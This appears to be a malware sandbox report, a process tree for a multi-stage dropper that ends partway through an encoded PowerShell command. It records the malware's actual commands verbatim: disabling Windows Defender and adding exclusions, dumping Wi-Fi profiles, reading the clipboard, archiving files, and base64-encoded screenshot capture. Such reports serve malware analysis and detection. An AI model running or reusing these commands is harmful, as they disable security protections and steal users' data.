PID 2520 wrote to memory of 1652	2520	rundll32.exe	111
PID 2584 wrote to memory of 3220	2584	4363463463464363463463463.exe	114
PID 2584 wrote to memory of 3220	2584	4363463463464363463463463.exe	114
PID 3680 wrote to memory of 384	3680	Gxtuum.exe	117
PID 3680 wrote to memory of 384	3680	Gxtuum.exe	117
PID 2584 wrote to memory of 324	2584	4363463463464363463463463.exe	118
PID 2584 wrote to memory of 324	2584	4363463463464363463463463.exe	118
PID 2584 wrote to memory of 324	2584	4363463463464363463463463.exe	118
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 2916	384	update.exe	120
PID 384 wrote to memory of 2916	384	update.exe	120
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 4084	384	update.exe	119
PID 384 wrote to memory of 2320	384	update.exe	121
PID 384 wrote to memory of 2320	384	update.exe	121
PID 384 wrote to memory of 2916	384	update.exe	120
PID 384 wrote to memory of 2916	384	update.exe	120
PID 384 wrote to memory of 2916	384	update.exe	120

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5728	attrib.exe
5908	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3008
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3436
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2584
- - C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2840
- - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- - C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1056
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAVQBrAG8AZABiAGMAZABjAGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAVQBrAG8AZABiAGMAZABjAGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AdgBhAHUAcgBuAGgAcQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAHYAYQB1AHIAbgBoAHEALgBlAHgAZQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2328
  - - C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:436
- - C:\Users\Admin\AppData\Local\Temp\Files\x6uvjuko.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\x6uvjuko.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1388
- - C:\Users\Admin\AppData\Local\Temp\Files\ctx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ctx.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3680
    - - C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1364
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4488
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2520
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\350944739639_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
    - - C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:384
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4084
      - C:\Windows\system32\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe"
        6⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
      - C:\Windows\system32\audiodg.exe
        
        "C:\Windows\system32\audiodg.exe"
        6⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:2320
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3652
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:2240
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\350944739639_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1976
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4768
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5612
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5516
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4300
- - C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3220
- - C:\Users\Admin\AppData\Local\Temp\Files\pothjmawdtrg.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pothjmawdtrg.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:324
- - C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:816
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5248
- - C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2440
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2348
    - - C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe"
        5⤵
        Executes dropped EXE
        
        PID:4076
    - - C:\ProgramData\Synaptics\Synaptics.exe
        
        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        5⤵
        Executes dropped EXE
        
        PID:4020
- - C:\Users\Admin\AppData\Local\Temp\Files\phost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"
    3⤵
    - Executes dropped EXE
    PID:5008
  - - C:\Users\Admin\AppData\Local\Temp\Files\phost.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      PID:384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\phost.exe'"
        5⤵
        
        PID:4384
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\phost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:548
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:4620
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:872
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
        5⤵
        
        PID:1980
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
        6⤵
        
        PID:776
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4260
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1056
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:4520
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:1664
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        5⤵
        
        PID:5100
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        6⤵
        
        PID:4500
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        5⤵
        
        PID:1116
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        6⤵
        
        PID:216
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:2204
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:4880
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:4492
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎‍.scr'"
        5⤵
        
        PID:4364
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎‍.scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4632
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:4052
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:3476
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:3480
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5100
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:3916
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:4296
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:5116
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:3196
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5340
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:396
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5308
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1276
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5324
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:100
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4520
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:5352
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        5⤵
        
        PID:4132
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        6⤵
        
        PID:5448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:3544
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAg